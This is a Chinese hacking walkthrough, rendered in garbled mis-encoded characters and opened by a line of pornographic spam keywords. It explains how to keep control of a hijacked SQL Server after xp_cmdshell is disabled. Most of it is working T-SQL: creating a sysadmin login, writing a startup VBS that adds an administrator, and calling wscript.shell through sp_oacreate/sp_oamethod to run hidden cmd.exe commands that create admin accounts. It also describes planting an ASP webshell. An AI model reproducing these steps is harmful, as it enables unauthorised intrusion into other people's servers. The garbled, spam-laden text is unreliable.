欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

饒過(guò)Xplog70.dll玩入侵(參考防范)

  發(fā)布時(shí)間:2010-06-29 17:45:42   作者:佚名   我要評(píng)論
深夜了,好友“如影隨行”突然發(fā)來(lái)消息,說(shuō)他一臺(tái)配置非常好的3389肉雞飛了。以前他是從WEB頁(yè)面注入入手,然后直接用Xp_cmdshell添加系統(tǒng)用戶(hù)搞定的,可晚上用3389登陸時(shí)突然發(fā)現(xiàn)添加的用戶(hù)不在了,安裝的后門(mén)都被清理干凈,連Xp_cmdshell也執(zhí)行不了。
朋友叫我?guī)兔纯?,這樣和管理員的直接攻防較量我還沒(méi)嘗試過(guò),所以也就答應(yīng)了!
  因?yàn)槭菙?shù)據(jù)庫(kù)是SA權(quán)限連接的,我首先想到的是利用下面的命令:
exec master.dbo.sp_addlogin renwoxin
我的目的是添加數(shù)據(jù)庫(kù)用戶(hù)“renwoxin”,然后將將其加入“Sysadmin”組:
Exec master.dbo.sp_addsrvrolemember renwoxin,sysadmin
然后就可以用祭出我們的“屠庫(kù)寶刀”——SQL查詢(xún)分析器了。開(kāi)始我還抱著一絲僥幸,希望可以通過(guò):
sp_addextendedproc Xp_cmdshell,@dllname='Xplog70.dll'
添加X(jué)p_cmdshell擴(kuò)展過(guò)程??上QL輸出如下:
數(shù)據(jù)庫(kù)中已存在名為Xp_cmdshell 的對(duì)象。
為了確認(rèn)Xp_cmdshell是否被刪除我提交如下語(yǔ)句:
select count(*) from master.dbo.sysobjects where xtype='X' and name=Xp_cmdshell
返回1,看來(lái)并未刪除Xp_cmdshell對(duì)象,那問(wèn)題應(yīng)該是出在Xplog70.dll這個(gè)文件了,也許被改名或者刪除了。
我決定用臭要飯的寫(xiě)的GetWebShell來(lái)寫(xiě)入ASP木馬。工具使用很簡(jiǎn)單,以往的黑防也有介紹過(guò)。我使用后一會(huì)兒就提示寫(xiě)入成功了,但等我高高興興的去訪問(wèn)這個(gè)路徑時(shí),卻提示“找不到網(wǎng)頁(yè)”,郁悶!
  百思不得其解,拿出NBSI2,利用Tree list工具列出WEB路徑下的文件,發(fā)現(xiàn)上傳的木馬“安詳”地躺在那兒,可為什么不能訪問(wèn)呢(我現(xiàn)在都還不知道答案,哪位高人知道希望能指點(diǎn)一下),而且錯(cuò)誤提示居然是“找不到文件”?!
我打算放棄了,可這么好的肉雞就這么飛了,實(shí)在心有不甘!到百度一通狂搜,終于找到一篇文章,文中提出了一種方法,用SQL查詢(xún)分析器寫(xiě)入如下指令:
Declare @o int, @f int, @t int, @ret int ,@a int
exec sp_oacreate ’scripting.filesystemobject’, @o out
——這兩行代碼是建立SQL的文本對(duì)象
exec sp_oamethod @o, ’createtextfile’, @f out,’c:\docume~1\alluse~1\「開(kāi)始」菜單\程序\啟動(dòng)\a.vbs’, 1
--在啟動(dòng)菜單里寫(xiě)入a.vbs,當(dāng)然這里只支持中文
exec @ret = sp_oamethod @f, ’writeline’, NULL,’set wshshell=createobject("wscript.shell")’
——單引號(hào)里的都是a.vbs的內(nèi)容,要一行一行的寫(xiě),下同。
exec @ret = sp_oamethod @f, ’writeline’, NULL,’a=wshshell.run ("cmd.exe /c net user user1 123 /add",0)’
exec @ret = sp_oamethod @f, ’writeline’, NULL,’b=wshshell.run ("cmd.exe /c net localgroup administrators user1 /add",0)’
--a.vbs內(nèi)容結(jié)束
按照作者的說(shuō)法,執(zhí)行查循后會(huì)在服務(wù)器的啟動(dòng)程序里寫(xiě)入一個(gè)a.vbs腳本。等服務(wù)器重啟就可以添加一個(gè)user1密碼為123的用戶(hù)??墒且确?wù)器重啟,要到哪一天啊?!
對(duì)著這段代碼是我是上看、下看、左看、右看,你還別說(shuō)真看出點(diǎn)什么了。這個(gè)腳本用Sp_oamethod來(lái)調(diào)用OLE對(duì)象的Writeline方法,突然靈光一閃,我能不能用Sp_oamethod來(lái)執(zhí)行CMD命令呢?趕緊找出“SQL Server聯(lián)機(jī)叢書(shū)”,其中對(duì)Sp_OAMethod描述如下:
sp_OAMethod
調(diào)用 OLE 對(duì)象的方法。
語(yǔ)法
sp_OAMethod objecttoken,
????methodname
????[, returnvalue OUTPUT]
????[ , [ @parametername = ] parameter [ OUTPUT ]
????[...n]]
參數(shù)
objecttoken
是先前用 sp_OACreate 創(chuàng)建的 OLE 對(duì)象令牌。
methodname
是要調(diào)用的 OLE 對(duì)象的方法名。
用WScript.Shell對(duì)象的Run方法來(lái)運(yùn)行Cmd.exe不就可以執(zhí)行Cmd命令了嗎?于是構(gòu)造如下語(yǔ)句:
DECLARE @cmd INT
EXEC sp_oacreate 'wscript.shell',@cmd output
EXEC sp_oamethod @cmd,'run',null,'cmd.exe /c net user renwoxin$ test /add','0','true'

小提示:上面語(yǔ)句的詳細(xì)解釋是:
用Sp_OACreate創(chuàng)建OLE 對(duì)象Wscript.Shell的令牌。
用Sp_oamethod調(diào)用Wscript.Shell的Run方法來(lái)執(zhí)行CMD語(yǔ)句,添加用戶(hù)renwoxin$,密碼為test。“0”和“true”是RUN方法的參數(shù):“0”可選。表示程序窗口外觀的整數(shù)值,表示語(yǔ)句執(zhí)行時(shí)隱藏CMD窗口,如果不加的話,在服務(wù)器上會(huì)有一個(gè)DOS窗口閃一下,容易暴露;“true”可選。布爾值,表示在繼續(xù)執(zhí)行腳本中的下一條語(yǔ)句之前,腳本是否等待執(zhí)行完程序。如果設(shè)為T(mén)rue,則在執(zhí)行完程序后才執(zhí)行腳本,RUN方法返回由程序返回的任何錯(cuò)誤代碼。如果設(shè)為False(默認(rèn)值),則RUN方法將自動(dòng)在啟動(dòng)程序后立即返回0(不是錯(cuò)誤代碼)。

上面的代碼執(zhí)行后,SQL查詢(xún)分析器返回一個(gè)0值,這表示執(zhí)行成功了,再將renwoxin$提升為管理員:
DECLARE @cmd INT
EXEC sp_oacreate 'wscript.shell',@cmd output
EXEC sp_oamethod @cmd,'run',null,'cmd.exe /c net localgroup administrators renwoxin$ /add','0','true'
這次又返回一個(gè)0值,還等什么,趕快從3389連過(guò)去看看,順利進(jìn)入!大家肯定會(huì)想到這個(gè)RUN可以執(zhí)行幾乎所有的CMD命令,只是如果你要看到結(jié)果,就需要自己構(gòu)造表來(lái)存儲(chǔ)了,大家可以發(fā)揮自己的想象力了!
找到SQL安裝目錄下的Binn文件夾,發(fā)現(xiàn)其中的Xplog70.dll果然被刪除了。再檢查一下,用GetWebShell提交的ASP木馬,內(nèi)容居然是亂碼!反正是不能執(zhí)行,到現(xiàn)在我還是想不通是為什么,希望大俠們能著文傳授。到此文章也該結(jié)束了,希望能盡快看到大俠們的文章。

相關(guān)文章

最新評(píng)論